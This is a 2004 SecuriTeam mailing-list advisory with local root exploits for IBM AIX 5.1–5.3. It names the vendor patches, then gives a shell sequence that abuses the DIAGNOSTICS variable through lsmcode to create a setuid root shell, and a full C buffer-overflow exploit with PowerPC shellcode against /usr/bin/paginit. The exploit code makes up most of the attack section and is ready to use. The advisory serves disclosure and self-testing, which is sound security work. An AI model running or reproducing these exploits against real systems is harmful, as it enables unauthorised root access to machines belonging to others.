[EXPL] AIX paginit, lsmcode and invscout Local Exploits

• Previous message: SecuriTeam: "[EXPL] Ultrix dxterm -setup Buffer Overflow"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 21 Dec 2004 18:12:22 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  AIX paginit, lsmcode and invscout Local Exploits
------------------------------------------------------------------------

SUMMARY

The following exploit codes can be used to test your system for the
vulnerabilities in paginit, lsmcode and invscout that we partly reported
about in our previous advisory:
<http://www.securiteam.com/unixfocus/6O00N0AC0A.html> IBM AIX invscout
Local Command Execution Vulnerability.

DETAILS

Vulnerable Systems:
 * IBM's AIX versions 5.1, 5.2 and 5.3

Solution:
The vendor has been contacted and has released the following patches:
1) For the diag bug, bugfix numbers are IY64389(5.1), IY64523(5.2), and
IY64277(5.3).
2) For the paginit bug, bugfix numbers are IY64358(5.1), IY64522(5.2), and
IY64312(5.3).

Diag vulnerability:
There are (at least) 4 broken suid binaries.
-r-sr-xr-x 1 root system 10014 Sep 16 2002 /usr/sbin/lsmcode
-r-sr-x--- 1 root system 2796 Jan 26 2003
/usr/sbin/diag_exec
-r-sr-xr-x 1 root system 450433 Apr 08 2004 /usr/sbin/invscout
-r-sr-xr-x 1 root system 511362 Apr 08 2004
/usr/sbin/invscoutd

All these binaries are exploited the same way: the path set in the
$DIAGNOSTICS environment is used by these binaries to execute
$DIAGNOSTICS/bin/Dctrl as root.

Example:
Executing the following gives a root shell:

mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh

Paginit vulnerability:
The following setuid binary:
-r-sr-xr-x 1 root security 7354 Mar 12 2003 /usr/bin/paginit

Does not do a bounds check on the first commandline argument, which is
supposed to be a username. If you feed paginit the proper data and hit
enter, root priviledges are gained.

Exploit:
/* exploit for /usr/bin/paginit
   tested on: AIX 5.2

   if the exploit fails it's because the shellcode
   ends up at a different address. use dbx to check,
   and change RETADDR accordingly.

   cees-bart <ceesb@cs.ru.nl>
*/

#define RETADDR 0x2ff22c90

char shellcode[] =
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"
"\x7c\xa8\x02\xa6"
"\x38\xe0\x11\x11"
"\x39\x20\x48\x11"
"\x7c\xc7\x48\x10"
"\x38\x46\xc9\x05"
"\x39\x25\x11\x11"
"\x38\x69\xef\x17"
"\x38\x87\xee\xef"
"\x7c\xc9\x03\xa6"
"\x4e\x80\x04\x20"
"\x2f\x62\x69\x6e"
"\x2f\x73\x68\x00"
;

char envlabel[] = "X=";

void printint(char* buf, int x) {
  buf[0] = x >> 24;
  buf[1] = (x >> 16) & 0xff;
  buf[2] = (x >> 8) & 0xff;
  buf[3] = x & 0xff;
}

int main(int argc, char **argv) {
  char *env[3];
  char code[1000];
  char buf[8000];
  char *p, *i;
  int offset1 = 0;

  offset1 = 0; // atoi(argv[1]);
  
  memset(code, 'C', sizeof(code));
  memcpy(code, envlabel,sizeof(envlabel)-1);
  // landingzone
  for(i=code+sizeof(envlabel)+offset1; i<code+sizeof(code); i+=4)
    printint(i, 0x7ca52a79);

  memcpy(code+sizeof(code)-sizeof(shellcode), shellcode,
sizeof(shellcode)-1);
  code[sizeof(code)-1] = 0;
  
  env[0] = code;
  env[1] = 0;

  memset(buf, 'A', sizeof(buf));
  buf[sizeof(buf)-1] = 0;
  
  p = buf;
  p += 4114;
  printint(p,RETADDR); // try to hit the landingzone
  p += 72;
  printint(p, RETADDR); // any readable address (apparently not
overwritten)

  execle("/usr/bin/paginit", "/usr/bin/paginit", buf, 0, env);
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:ceesb@cs.ru.nl> cees-bart.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[EXPL] Ultrix dxterm -setup Buffer Overflow"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]